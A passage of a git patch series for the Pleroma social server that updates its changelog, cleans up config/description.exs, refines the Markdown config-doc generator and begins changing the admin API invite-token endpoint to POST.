+- Admin API: Return `total` when querying for reports
+
+## [1.1.0] - 2019-??-??
### Security
-- OStatus: eliminate the possibility of a protocol downgrade attack.
-- OStatus: prevent following locked accounts, bypassing the approval process.
- Mastodon API: respect post privacy in `/api/v1/statuses/:id/{favourited,reblogged}_by`
### Removed
- **Breaking:** GNU Social API with Qvitter extensions support
-- **Breaking:** ActivityPub: The `accept_blocks` configuration setting.
- Emoji: Remove longfox emojis.
- Remove `Reply-To` header from report emails for admins.
### Changed
-- **Breaking:** Elixir >=1.8 is now required (was >= 1.7)
- **Breaking:** Configuration: A setting to explicitly disable the mailer was added, defaulting to true, if you are using a mailer add `config :pleroma, Pleroma.Emails.Mailer, enabled: true` to your config
- **Breaking:** Configuration: `/media/` is now removed when `base_url` is configured, append `/media/` to your `base_url` config to keep the old behaviour if desired
- **Breaking:** `/api/pleroma/notifications/read` is moved to `/api/v1/pleroma/notifications/read` and now supports `max_id` and responds with Mastodon API entities.
-- Configuration: OpenGraph and TwitterCard providers enabled by default
-- Configuration: Filter.AnonymizeFilename added ability to retain file extension with custom text
- Configuration: added `config/description.exs`, from which `docs/config.md` is generated
- Federation: Return 403 errors when trying to request pages from a user's follower/following collections if they have `hide_followers`/`hide_follows` set
- NodeInfo: Return `skipThreadContainment` in `metadata` for the `skip_thread_containment` option
@@ -31,24 +32,16 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- AdminAPI: Add "godmode" while fetching user statuses (i.e. admin can see private statuses)
- Improve digest email template
– Pagination: (optional) return `total` alongside with `items` when paginating
-- Replaced [pleroma_job_queue](https://git.pleroma.social/pleroma/pleroma_job_queue) and `Pleroma.Web.Federator.RetryQueue` with [Oban](https://github.com/sorentwo/oban) (see [`docs/config.md`](docs/config.md) on migrating customized worker / retry settings)
-- Introduced [quantum](https://github.com/quantum-elixir/quantum-core) job scheduler
-- Admin API: Return `total` when querying for reports
### Fixed
- Following from Osada
-- Not being able to pin unlisted posts
-- Objects being re-embedded to activities after being updated (e.g faved/reposted). Running 'mix pleroma.database prune_objects' again is advised.
- Favorites timeline doing database-intensive queries
- Metadata rendering errors resulting in the entire page being inaccessible
- `federation_incoming_replies_max_depth` option being ignored in certain cases
-- Federation/MediaProxy not working with instances that have wrong certificate order
- Mastodon API: Handling of search timeouts (`/api/v1/search` and `/api/v2/search`)
- Mastodon API: Misskey's endless polls being unable to render
- Mastodon API: Embedded relationships not being properly rendered in the Account entity of Status entity
- Mastodon API: Notifications endpoint crashing if one notification failed to render
-- Mastodon API: follower/following counters not being nullified, when `hide_follows`/`hide_followers` is set
-- Mastodon API: `muted` in the Status entity, using author's account to determine if the tread was muted
- Mastodon API: Add `account_id`, `type`, `offset`, and `limit` to search API (`/api/v1/search` and `/api/v2/search`)
- Mastodon API, streaming: Fix filtering of notifications based on blocks/mutes/thread mutes
- ActivityPub C2S: follower/following collection pages being inaccessible even when authentifucated if `hide_followers`/ `hide_follows` was set
@@ -56,15 +49,9 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- Rich Media: Parser failing when no TTL can be found by image TTL setters
- Rich Media: The crawled URL is now spliced into the rich media data.
- ActivityPub S2S: sharedInbox usage has been mostly aligned with the rules in the AP specification.
-- ActivityPub S2S: remote user deletions now work the same as local user deletions.
-- ActivityPub S2S: POST requests are now signed with `(request-target)` pseudo-header.
-- Not being able to access the Mastodon FE login page on private instances
-- Invalid SemVer version generation, when the current branch does not have commits ahead of tag/checked out on a tag
- Pleroma.Upload base_url was not automatically whitelisted by MediaProxy. Now your custom CDN or file hosting will be accessed directly as expected.
- Report email not being sent to admins when the reporter is a remote user
-- MRF: ensure that subdomain_match calls are case-insensitive
- Reverse Proxy limiting `max_body_length` was incorrectly defined and only checked `Content-Length` headers which may not be sufficient in some circumstances
-- MRF: fix use of unserializable keyword lists in describe() implementations
- ActivityPub: Deactivated user deletion
- ActivityPub: Fix `/users/:nickname/inbox` crashing without an authenticated user
- MRF: fix ability to follow a relay when AntiFollowbotPolicy was enabled
@@ -75,16 +62,9 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- Mastodon API: all status JSON responses contain a `pleroma.expires_at` item which states when an activity will expire. The value is only shown to the user who created the activity. To everyone else it's empty.
- Configuration: `ActivityExpiration.enabled` controls whether expired activites will get deleted at the appropriate time. Enabled by default.
- Conversations: Add Pleroma-specific conversation endpoints and status posting extensions. Run the `bump_all_conversations` task again to create the necessary data.
-- **Breaking:** MRF describe API, which adds support for exposing configuration information about MRF policies to NodeInfo.
- Custom modules will need to be updated by adding, at the very least, `def describe, do: {:ok, %{}}` to the MRF policy modules.
- MRF: Support for priming the mediaproxy cache (`Pleroma.Web.ActivityPub.MRF.MediaProxyWarmingPolicy`)
- MRF: Support for excluding specific domains from Transparency.
- MRF: Support for filtering posts based on who they mention (`Pleroma.Web.ActivityPub.MRF.MentionPolicy`)
-- MRF: Support for filtering posts based on ActivityStreams vocabulary (`Pleroma.Web.ActivityPub.MRF.VocabularyPolicy`)
-- MRF (Simple Policy): Support for wildcard domains.
-- Support for wildcard domains in user domain blocks setting.
-- Configuration: `quarantined_instances` support wildcard domains.
-- Configuration: `federation_incoming_replies_max_depth` option
- Mastodon API: Support for the [`tagged` filter](https://github.com/tootsuite/mastodon/pull/9755) in [`GET /api/v1/accounts/:id/statuses`](https://docs.joinmastodon.org/api/rest/accounts/#get-api-v1-accounts-id-statuses)
- Mastodon API, streaming: Add support for passing the token in the `Sec-WebSocket-Protocol` header
- Mastodon API, extension: Ability to reset avatar, profile banner, and background
@@ -112,9 +92,6 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- Admin API: Endpoint for fetching latest user's statuses
- Pleroma API: Add `/api/v1/pleroma/accounts/confirmation_resend?email=` for resending account confirmation.
- Pleroma API: Email change endpoint.
-- Relays: Added a task to list relay subscriptions.
-- Mix Tasks: `mix pleroma.database fix_likes_collections`
-- Federation: Remove `likes` from objects.
- Admin API: Added moderation log
- Web response cache (currently, enabled for ActivityPub)
- Mastodon API: Added an endpoint to get multiple statuses by IDs (`GET /api/v1/statuses/?ids[]=1&ids[]=2`)
@@ -125,6 +102,61 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- RichMedia: parsers and their order are configured in `rich_media` config.
- RichMedia: add the rich media ttl based on image expiration time.
+## [1.0.6] - 2019-08-14
+### Fixed
+- MRF: fix use of unserializable keyword lists in describe() implementations
+- ActivityPub S2S: POST requests are now signed with `(request-target)` pseudo-header.
+
+## [1.0.5] - 2019-08-13
+### Fixed
+- Mastodon API: follower/following counters not being nullified, when `hide_follows`/`hide_followers` is set
+- Mastodon API: `muted` in the Status entity, using author's account to determine if the thread was muted
+- Mastodon API: return the actual profile URL in the Account entity's `url` property when appropriate
+- Templates: properly style anchor tags
+- Objects being re-embedded to activities after being updated (e.g faved/reposted). Running 'mix pleroma.database prune_objects' again is advised.
+- Not being able to access the Mastodon FE login page on private instances
+- MRF: ensure that subdomain_match calls are case-insensitive
+- Fix internal server error when using the healthcheck API.
+
+### Added
+- **Breaking:** MRF describe API, which adds support for exposing configuration information about MRF policies to NodeInfo.
+ Custom modules will need to be updated by adding, at the very least, `def describe, do: {:ok, %{}}` to the MRF policy modules.
+- Relays: Added a task to list relay subscriptions.
+- MRF: Support for filtering posts based on ActivityStreams vocabulary (`Pleroma.Web.ActivityPub.MRF.VocabularyPolicy`)
+- MRF (Simple Policy): Support for wildcard domains.
+- Support for wildcard domains in user domain blocks setting.
+- Configuration: `quarantined_instances` support wildcard domains.
+- Mix Tasks: `mix pleroma.database fix_likes_collections`
+- Configuration: `federation_incoming_replies_max_depth` option
+
+### Removed
+- Federation: Remove `likes` from objects.
+- ActivityPub: The `accept_blocks` configuration setting.
+
+## [1.0.4] - 2019-08-01
+### Fixed
+- Invalid SemVer version generation, when the current branch does not have commits ahead of tag/checked out on a tag
+
+## [1.0.3] - 2019-07-31
+### Security
+- OStatus: eliminate the possibility of a protocol downgrade attack.
+- OStatus: prevent following locked accounts, bypassing the approval process.
+- TwitterAPI: use CommonAPI to handle remote follows instead of OStatus.
+
+## [1.0.2] - 2019-07-28
+### Fixed
+- Not being able to pin unlisted posts
+- Mastodon API: represent poll IDs as strings
+- MediaProxy: fix matching filenames
+- MediaProxy: fix filename encoding
+- Migrations: fix a sporadic migration failure
+- Metadata rendering errors resulting in the entire page being inaccessible
+- Federation/MediaProxy not working with instances that have wrong certificate order
+- ActivityPub S2S: remote user deletions now work the same as local user deletions.
+
+### Changed
+- Configuration: OpenGraph and TwitterCard providers enabled by default
+- Configuration: Filter.AnonymizeFilename added ability to retain file extension with custom text
## [1.0.1] - 2019-07-14
### Security
From 50ec445b2c1e45b0d3b3a2016650f3262ed00e75 Mon Sep 17 00:00:00 2001
From: "Haelwenn (lanodan) Monnier"
Date: Tue, 17 Sep 2019 21:57:13 +0200
Subject: [PATCH 107/272] description.exs: remove empty strings and arrays
---
config/description.exs | 24 ++++++++----------------
1 file changed, 8 insertions(+), 16 deletions(-)
diff --git a/config/description.exs b/config/description.exs
index 5ae32d0f2..959d839bc 100644
--- a/config/description.exs
+++ b/config/description.exs
@@ -109,8 +109,7 @@
type: :string,
description:
"If you use S3 compatible service such as Digital Ocean Spaces or CDN, set folder name or \"\" etc." <>
- " For example, when using CDN to S3 virtual host format, set \"\". At this time, write CNAME to CDN in public_endpoint.",
- suggestions: [""]
+ " For example, when using CDN to S3 virtual host format, set \"\". At this time, write CNAME to CDN in public_endpoint."
}
]
},
@@ -360,22 +359,19 @@
group: {:subgroup, Swoosh.Adapters.SocketLabs},
key: :server_id,
type: :string,
- description: "`Swoosh.Adapters.SocketLabs` adapter specific setting",
- suggestions: [""]
+ description: "`Swoosh.Adapters.SocketLabs` adapter specific setting"
},
%{
group: {:subgroup, Swoosh.Adapters.SocketLabs},
key: :api_key,
type: :string,
- description: "`Swoosh.Adapters.SocketLabs` adapter specific setting",
- suggestions: [""]
+ description: "`Swoosh.Adapters.SocketLabs` adapter specific setting"
},
%{
group: {:subgroup, Swoosh.Adapters.Gmail},
key: :access_token,
type: :string,
- description: "`Swoosh.Adapters.Gmail` adapter specific setting",
- suggestions: [""]
+ description: "`Swoosh.Adapters.Gmail` adapter specific setting"
}
]
},
@@ -1682,8 +1678,7 @@
group: :pleroma_job_queue,
key: :queues,
type: :group,
- description: "[Deprecated] Replaced with `Oban`/`:queues` (keeping the same format)",
- children: []
+ description: "[Deprecated] Replaced with `Oban`/`:queues` (keeping the same format)"
},
%{
group: :pleroma,
@@ -1694,8 +1689,7 @@
%{
key: :max_retries,
type: :integer,
- description: "[Deprecated] Replaced as `Oban`/`:queues`/`:outgoing_federation` value",
- suggestions: []
+ description: "[Deprecated] Replaced as `Oban`/`:queues`/`:outgoing_federation` value"
}
]
},
@@ -2041,8 +2035,7 @@
%{
key: :sslopts,
type: :keyword,
- description: "additional SSL options",
- suggestions: []
+ description: "additional SSL options"
},
%{
key: :tls,
@@ -2052,8 +2045,7 @@
%{
key: :tlsopts,
type: :keyword,
- description: "additional TLS options",
- suggestions: []
+ description: "additional TLS options"
},
%{
key: :base,
From e0d8c8897e46d20039b4c0a383bca0192c5eb2ec Mon Sep 17 00:00:00 2001
From: "Haelwenn (lanodan) Monnier"
Date: Tue, 17 Sep 2019 22:00:02 +0200
Subject: [PATCH 108/272] docs/markdown.ex: do no print empty suggestions
---
lib/pleroma/docs/markdown.ex | 2 ++
1 file changed, 2 insertions(+)
diff --git a/lib/pleroma/docs/markdown.ex b/lib/pleroma/docs/markdown.ex
index 58a42b323..d7ca97957 100644
--- a/lib/pleroma/docs/markdown.ex
+++ b/lib/pleroma/docs/markdown.ex
@@ -66,6 +66,8 @@ defp print_suggestion(file, suggestion, as_list \\ false) do
defp print_suggestions(_file, nil), do: nil
+ defp print_suggestions(_file, ""), do: nil
+
defp print_suggestions(file, suggestions) do
IO.write(file, "Suggestions:\n")
From 106afaed58da3a25d1c4593e13192ad2145643e4 Mon Sep 17 00:00:00 2001
From: "Haelwenn (lanodan) Monnier"
Date: Tue, 17 Sep 2019 22:04:21 +0200
Subject: [PATCH 109/272] markdown.ex: do not fail if there is no children
---
lib/pleroma/docs/markdown.ex | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/pleroma/docs/markdown.ex b/lib/pleroma/docs/markdown.ex
index d7ca97957..20bd1c896 100644
--- a/lib/pleroma/docs/markdown.ex
+++ b/lib/pleroma/docs/markdown.ex
@@ -23,7 +23,7 @@ def process(descriptions) do
IO.write(file, "#{group[:description]}\n")
- for child <- group[:children] do
+ for child <- group[:children] || [] do
print_child_header(file, child)
print_suggestions(file, child[:suggestions])
From c0c56282007aff88a923bba4769af894cb6235af Mon Sep 17 00:00:00 2001
From: "Haelwenn (lanodan) Monnier"
Date: Tue, 17 Sep 2019 22:14:56 +0200
Subject: [PATCH 110/272] description.exs: remove empty strings on descriptions
---
config/description.exs | 76 +++++-------------------------------
lib/pleroma/docs/markdown.ex | 8 +++-
2 files changed, 15 insertions(+), 69 deletions(-)
diff --git a/config/description.exs b/config/description.exs
index 959d839bc..821b76972 100644
--- a/config/description.exs
+++ b/config/description.exs
@@ -857,7 +857,6 @@
%{
key: :metadata,
type: {:list, :atom},
- description: "",
suggestions: [[:request_id]]
}
]
@@ -883,7 +882,6 @@
%{
key: :metadata,
type: {:list, :atom},
- description: "",
suggestions: [[:request_id]]
}
]
@@ -1177,7 +1175,6 @@
group: :pleroma,
key: :mrf_rejectnonpublic,
type: :group,
- description: "",
children: [
%{
key: :allow_followersonly,
@@ -1444,43 +1441,36 @@
%{
key: :instrumenters,
type: {:list, :module},
- description: "",
suggestions: [Pleroma.Web.Endpoint.Instrumenter]
},
%{
key: :protocol,
type: :string,
- description: "",
suggestions: ["https"]
},
%{
key: :secret_key_base,
type: :string,
- description: "",
suggestions: ["aK4Abxf29xU9TTDKre9coZPUgevcVCFQJe/5xP/7Lt4BEif6idBIbjupVbOrbKxl"]
},
%{
key: :signing_salt,
type: :string,
- description: "",
suggestions: ["CqaoopA2"]
},
%{
key: :render_errors,
type: :keyword,
- description: "",
suggestions: [[view: Pleroma.Web.ErrorView, accepts: ~w(json)]],
children: [
%{
key: :view,
type: :module,
- description: "",
suggestions: [Pleroma.Web.ErrorView]
},
%{
key: :accepts,
type: {:list, :string},
- description: "",
suggestions: ["json"]
}
]
@@ -1488,32 +1478,27 @@
%{
key: :pubsub,
type: :keyword,
- description: "",
suggestions: [[name: Pleroma.PubSub, adapter: Phoenix.PubSub.PG2]],
children: [
%{
key: :name,
type: :module,
- description: "",
suggestions: [Pleroma.PubSub]
},
%{
key: :adapter,
type: :module,
- description: "",
suggestions: [Phoenix.PubSub.PG2]
}
]
},
%{
key: :secure_cookie_flag,
- type: :boolean,
- description: ""
+ type: :boolean
},
%{
key: :extra_cookie_attrs,
type: {:list, :string},
- description: "",
suggestions: ["SameSite=Lax"]
}
]
@@ -1842,7 +1827,6 @@
group: :pleroma,
key: :rich_media,
type: :group,
- description: "",
children: [
%{
key: :enabled,
@@ -1995,7 +1979,6 @@
%{
key: Pleroma.Web.Auth.Authenticator,
type: :module,
- description: "",
suggestions: [Pleroma.Web.Auth.PleromaAuthenticator, Pleroma.Web.Auth.LDAPAuthenticator]
}
]
@@ -2172,37 +2155,31 @@
%{
key: :link_color,
type: :string,
- description: "",
suggestions: ["#d8a070"]
},
%{
key: :background_color,
type: :string,
- description: "",
suggestions: ["#2C3645"]
},
%{
key: :content_background_color,
type: :string,
- description: "",
suggestions: ["#1B2635"]
},
%{
key: :header_color,
type: :string,
- description: "",
suggestions: ["#d8a070"]
},
%{
key: :text_color,
type: :string,
- description: "",
suggestions: ["#b9b9ba"]
},
%{
key: :text_muted_color,
type: :string,
- description: "",
suggestions: ["#b9b9ba"]
}
]
@@ -2245,7 +2222,6 @@
group: :pleroma,
key: :emoji,
type: :group,
- description: "",
children: [
%{
key: :shortcode_globs,
@@ -2387,7 +2363,6 @@
%{
key: :types,
type: :map,
- description: "",
suggestions: [
%{
"application/xml" => ["xml"],
@@ -2401,31 +2376,26 @@
%{
key: "application/xml",
type: {:list, :string},
- description: "",
suggestions: [["xml"]]
},
%{
key: "application/xrd+xml",
type: {:list, :string},
- description: "",
suggestions: [["xrd+xml"]]
},
%{
key: "application/jrd+json",
type: {:list, :string},
- description: "",
suggestions: [["jrd+json"]]
},
%{
key: "application/activity+json",
type: {:list, :string},
- description: "",
suggestions: [["activity+json"]]
},
%{
key: "application/ld+json",
type: {:list, :string},
- description: "",
suggestions: [["activity+json"]]
}
]
@@ -2453,8 +2423,7 @@
children: [
%{
key: :enabled,
- type: :boolean,
- description: ""
+ type: :boolean
}
]
},
@@ -2462,7 +2431,6 @@
group: :pleroma,
key: :suggestions,
type: :group,
- description: "",
children: [
%{
key: :enabled,
@@ -2492,7 +2460,6 @@
%{
key: :web,
type: :string,
- description: "",
suggestions: ["https://vinayaka.distsn.org"]
}
]
@@ -2519,7 +2486,6 @@
%{
key: :adapter,
type: :module,
- description: "",
suggestions: [Pleroma.Signature]
}
]
@@ -2528,18 +2494,15 @@
group: :pleroma,
key: Pleroma.Uploaders.MDII,
type: :group,
- description: "",
children: [
%{
key: :cgi,
type: :string,
- description: "",
suggestions: ["https://mdii.sakura.ne.jp/mdii-post.cgi"]
},
%{
key: :files,
type: :string,
- description: "",
suggestions: ["https://mdii.sakura.ne.jp"]
}
]
@@ -2553,18 +2516,15 @@
%{
key: :proxy_url,
type: [:string, :atom, nil],
- description: "",
suggestions: ["localhost:9020", {:socks5, :localhost, 3090}, nil]
},
%{
key: :send_user_agent,
- type: :boolean,
- description: ""
+ type: :boolean
},
%{
key: :adapter,
type: :keyword,
- description: "",
suggestions: [
[
ssl_options: [
@@ -2582,32 +2542,26 @@
group: :pleroma,
key: :markup,
type: :group,
- description: "",
children: [
%{
key: :allow_inline_images,
- type: :boolean,
- description: ""
+ type: :boolean
},
%{
key: :allow_headings,
- type: :boolean,
- description: ""
+ type: :boolean
},
%{
key: :allow_tables,
- type: :boolean,
- description: ""
+ type: :boolean
},
%{
key: :allow_fonts,
- type: :boolean,
- description: ""
+ type: :boolean
},
%{
key: :scrub_policy,
type: {:list, :module},
- description: "",
suggestions: [[Pleroma.HTML.Transform.MediaProxy, Pleroma.HTML.Scrubber.Default]]
}
]
@@ -2616,12 +2570,10 @@
group: :pleroma,
key: :user,
type: :group,
- description: "",
children: [
%{
key: :deny_follow_blocked,
- type: :boolean,
- description: ""
+ type: :boolean
}
]
},
@@ -2629,12 +2581,10 @@
group: :pleroma,
key: :mrf_normalize_markup,
type: :group,
- description: "",
children: [
%{
key: :scrub_policy,
type: :module,
- description: "",
suggestions: [Pleroma.HTML.Scrubber.Default]
}
]
@@ -2643,12 +2593,10 @@
group: :pleroma,
key: Pleroma.User,
type: :group,
- description: "",
children: [
%{
key: :restricted_nicknames,
type: {:list, :string},
- description: "",
suggestions: [
[
".well-known",
@@ -2689,24 +2637,20 @@
%{
group: :cors_plug,
type: :group,
- description: "",
children: [
%{
key: :max_age,
type: :integer,
- description: "",
suggestions: [86_400]
},
%{
key: :methods,
type: {:list, :string},
- description: "",
suggestions: [["POST", "PUT", "DELETE", "GET", "PATCH", "OPTIONS"]]
},
%{
key: :expose,
type: :string,
- description: "",
suggestions: [
[
"Link",
@@ -2720,13 +2664,11 @@
},
%{
key: :credentials,
- type: :boolean,
- description: ""
+ type: :boolean
},
%{
key: :headers,
type: {:list, :string},
- description: "",
suggestions: [["Authorization", "Content-Type", "Idempotency-Key"]]
}
]
diff --git a/lib/pleroma/docs/markdown.ex b/lib/pleroma/docs/markdown.ex
index 20bd1c896..739e4fce3 100644
--- a/lib/pleroma/docs/markdown.ex
+++ b/lib/pleroma/docs/markdown.ex
@@ -44,13 +44,17 @@ def process(descriptions) do
{:ok, config_path}
end
- defp print_child_header(file, child) do
+ defp print_child_header(file, %{key: key, type: type, description: description} = _child) do
IO.write(
file,
- "- `#{inspect(child[:key])}` (`#{inspect(child[:type])}`): #{child[:description]}\n"
+ "- `#{inspect(key)}` (`#{inspect(type)}`): #{description}\n"
)
end
+ defp print_child_header(file, %{key: key, type: type} = _child) do
+ IO.write(file, "- `#{inspect(key)}` (`#{inspect(type)}`)\n")
+ end
+
defp print_suggestion(file, suggestion) when is_list(suggestion) do
IO.write(file, " `#{inspect(suggestion)}`\n")
end
From 32d64102cb2f8cf3b0f825f2ac0770563cfb457f Mon Sep 17 00:00:00 2001
From: "Haelwenn (lanodan) Monnier"
Date: Tue, 17 Sep 2019 22:19:30 +0200
Subject: [PATCH 111/272] description.exs: uncomment type for email logo
---
config/description.exs | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/config/description.exs b/config/description.exs
index 821b76972..65ea6bf01 100644
--- a/config/description.exs
+++ b/config/description.exs
@@ -2133,7 +2133,7 @@
children: [
%{
key: :logo,
- # type: [:string, nil],
+ type: [:string, nil],
description: "a path to a custom logo. Set it to nil to use the default Pleroma logo",
suggestions: ["some/path/logo.png", nil]
},
From d6182a3c8fef6377c20bb827a8e86bdac5bfb125 Mon Sep 17 00:00:00 2001
From: "Haelwenn (lanodan) Monnier"
Date: Tue, 17 Sep 2019 22:22:54 +0200
Subject: [PATCH 112/272] markdown.ex: Make suggestion(s) plural only if on >1
---
lib/pleroma/docs/markdown.ex | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/lib/pleroma/docs/markdown.ex b/lib/pleroma/docs/markdown.ex
index 739e4fce3..fc6389064 100644
--- a/lib/pleroma/docs/markdown.ex
+++ b/lib/pleroma/docs/markdown.ex
@@ -73,13 +73,15 @@ defp print_suggestions(_file, nil), do: nil
defp print_suggestions(_file, ""), do: nil
defp print_suggestions(file, suggestions) do
- IO.write(file, "Suggestions:\n")
-
if length(suggestions) > 1 do
+ IO.write(file, "Suggestions:\n")
+
for suggestion <- suggestions do
print_suggestion(file, suggestion, true)
end
else
+ IO.write(file, "Suggestion:\n")
+
print_suggestion(file, List.first(suggestions))
end
end
From d2097fd0f5d5d6750de09243cb5720b161305790 Mon Sep 17 00:00:00 2001
From: "Haelwenn (lanodan) Monnier"
Date: Tue, 17 Sep 2019 22:33:32 +0200
Subject: [PATCH 113/272] markdown.ex: \n\n on >1 suggestions, 2-spaces on one
---
lib/pleroma/docs/markdown.ex | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/lib/pleroma/docs/markdown.ex b/lib/pleroma/docs/markdown.ex
index fc6389064..280fe0309 100644
--- a/lib/pleroma/docs/markdown.ex
+++ b/lib/pleroma/docs/markdown.ex
@@ -74,13 +74,13 @@ defp print_suggestions(_file, ""), do: nil
defp print_suggestions(file, suggestions) do
if length(suggestions) > 1 do
- IO.write(file, "Suggestions:\n")
+ IO.write(file, "\n\nSuggestions:\n")
for suggestion <- suggestions do
print_suggestion(file, suggestion, true)
end
else
- IO.write(file, "Suggestion:\n")
+ IO.write(file, " Suggestion: ")
print_suggestion(file, List.first(suggestions))
end
From 4785596a2cf638570b35afc91babbb0ac8309981 Mon Sep 17 00:00:00 2001
From: "Haelwenn (lanodan) Monnier"
Date: Tue, 17 Sep 2019 22:55:29 +0200
Subject: [PATCH 114/272] markdown.ex: end suggestions list with a newline
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Otherwise we end up with suggestion on the same level as the childs
Markdown is a fuck…
---
lib/pleroma/docs/markdown.ex | 2 ++
mix.exs | 3 ++-
2 files changed, 4 insertions(+), 1 deletion(-)
diff --git a/lib/pleroma/docs/markdown.ex b/lib/pleroma/docs/markdown.ex
index 280fe0309..27be1b095 100644
--- a/lib/pleroma/docs/markdown.ex
+++ b/lib/pleroma/docs/markdown.ex
@@ -79,6 +79,8 @@ defp print_suggestions(file, suggestions) do
for suggestion <- suggestions do
print_suggestion(file, suggestion, true)
end
+
+ IO.write(file, "\n")
else
IO.write(file, " Suggestion: ")
diff --git a/mix.exs b/mix.exs
index 58d1606d3..e4fe5adf4 100644
--- a/mix.exs
+++ b/mix.exs
@@ -174,7 +174,8 @@ defp aliases do
"ecto.rollback": ["pleroma.ecto.rollback"],
"ecto.setup": ["ecto.create", "ecto.migrate", "run priv/repo/seeds.exs"],
"ecto.reset": ["ecto.drop", "ecto.setup"],
- test: ["ecto.create --quiet", "ecto.migrate", "test"]
+ test: ["ecto.create --quiet", "ecto.migrate", "test"],
+ docs: ["pleroma.docs", "docs"]
]
end
From e501c822c98edb675b71b25d165fdf8df8447c27 Mon Sep 17 00:00:00 2001
From: "Haelwenn (lanodan) Monnier"
Date: Tue, 17 Sep 2019 23:02:24 +0200
Subject: [PATCH 115/272] markdown.ex: put two-spaces before the
description-newline
---
lib/pleroma/docs/markdown.ex | 8 +++-----
1 file changed, 3 insertions(+), 5 deletions(-)
diff --git a/lib/pleroma/docs/markdown.ex b/lib/pleroma/docs/markdown.ex
index 27be1b095..68b106499 100644
--- a/lib/pleroma/docs/markdown.ex
+++ b/lib/pleroma/docs/markdown.ex
@@ -47,12 +47,12 @@ def process(descriptions) do
defp print_child_header(file, %{key: key, type: type, description: description} = _child) do
IO.write(
file,
- "- `#{inspect(key)}` (`#{inspect(type)}`): #{description}\n"
+ "- `#{inspect(key)}` (`#{inspect(type)}`): #{description} \n"
)
end
defp print_child_header(file, %{key: key, type: type} = _child) do
- IO.write(file, "- `#{inspect(key)}` (`#{inspect(type)}`)\n")
+ IO.write(file, "- `#{inspect(key)}` (`#{inspect(type)}`) \n")
end
defp print_suggestion(file, suggestion) when is_list(suggestion) do
@@ -74,13 +74,11 @@ defp print_suggestions(_file, ""), do: nil
defp print_suggestions(file, suggestions) do
if length(suggestions) > 1 do
- IO.write(file, "\n\nSuggestions:\n")
+ IO.write(file, "Suggestions:\n")
for suggestion <- suggestions do
print_suggestion(file, suggestion, true)
end
-
- IO.write(file, "\n")
else
IO.write(file, " Suggestion: ")
From ea6d4137dac60ae23e15ab29901a84d8468baf3e Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Tue, 17 Sep 2019 21:24:21 +0000
Subject: [PATCH 116/272] Apply suggestion to CHANGELOG.md
---
CHANGELOG.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 1f0d55e9b..f3f38b817 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -131,7 +131,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
### Removed
- Federation: Remove `likes` from objects.
-- ActivityPub: The `accept_blocks` configuration setting.
+- **Breaking:** ActivityPub: The `accept_blocks` configuration setting.
## [1.0.4] - 2019-08-01
### Fixed
From 4faf2b1555f004664005e0efddb9815ebca4c5c7 Mon Sep 17 00:00:00 2001
From: Alex S
Date: Fri, 6 Sep 2019 17:14:31 +0300
Subject: [PATCH 117/272] post for creating invite tokens in admin api
---
CHANGELOG.md | 4 ++
docs/api/admin_api.md | 16 ++++++-
.../web/admin_api/admin_api_controller.ex | 18 ++++++--
lib/pleroma/web/router.ex | 2 +-
.../admin_api/admin_api_controller_test.exs | 46 +++++++------------
5 files changed, 49 insertions(+), 37 deletions(-)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index f3f38b817..a8342b16c 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -23,7 +23,11 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- **Breaking:** Configuration: A setting to explicitly disable the mailer was added, defaulting to true, if you are using a mailer add `config :pleroma, Pleroma.Emails.Mailer, enabled: true` to your config
- **Breaking:** Configuration: `/media/` is now removed when `base_url` is configured, append `/media/` to your `base_url` config to keep the old behaviour if desired
- **Breaking:** `/api/pleroma/notifications/read` is moved to `/api/v1/pleroma/notifications/read` and now supports `max_id` and responds with Mastodon API entities.
+- **Breaking:** `/api/pleroma/admin/users/invite_token` now uses `POST`, changed accepted params and returns full invite in json instead of only token string.
- Configuration: added `config/description.exs`, from which `docs/config.md` is generated
+- Configuration: OpenGraph and TwitterCard providers enabled by default
+- Configuration: Filter.AnonymizeFilename added ability to retain file extension with custom text
+- Mastodon API: `pleroma.thread_muted` key in the Status entity
- Federation: Return 403 errors when trying to request pages from a user's follower/following collections if they have `hide_followers`/`hide_follows` set
- NodeInfo: Return `skipThreadContainment` in `metadata` for the `skip_thread_containment` option
- NodeInfo: Return `mailerEnabled` in `metadata`
diff --git a/docs/api/admin_api.md b/docs/api/admin_api.md
index 9362e3d78..a8c75d93f 100644
--- a/docs/api/admin_api.md
+++ b/docs/api/admin_api.md
@@ -226,13 +226,25 @@ Note: Available `:permission_group` is currently moderator and admin. 404 is ret
### Get an account registration invite token
-- Methods: `GET`
+- Methods: `POST`
- Params:
- *optional* `invite` => [
- *optional* `max_use` (integer)
- *optional* `expires_at` (date string e.g. "2019-04-07")
]
-- Response: invite token (base64 string)
+- Response:
+
+```json
+{
+ "id": integer,
+ "token": string,
+ "used": boolean,
+ "expires_at": date,
+ "uses": integer,
+ "max_use": integer,
+ "invite_type": string (possible values: `one_time`, `reusable`, `date_limited`, `reusable_date_limited`)
+}
+```
## `/api/pleroma/admin/users/invites`
diff --git a/lib/pleroma/web/admin_api/admin_api_controller.ex b/lib/pleroma/web/admin_api/admin_api_controller.ex
index 2a1cc59e5..41ded7343 100644
--- a/lib/pleroma/web/admin_api/admin_api_controller.ex
+++ b/lib/pleroma/web/admin_api/admin_api_controller.ex
@@ -402,11 +402,21 @@ def email_invite(%{assigns: %{user: user}} = conn, %{"email" => email} = params)
@doc "Get a account registeration invite token (base64 string)"
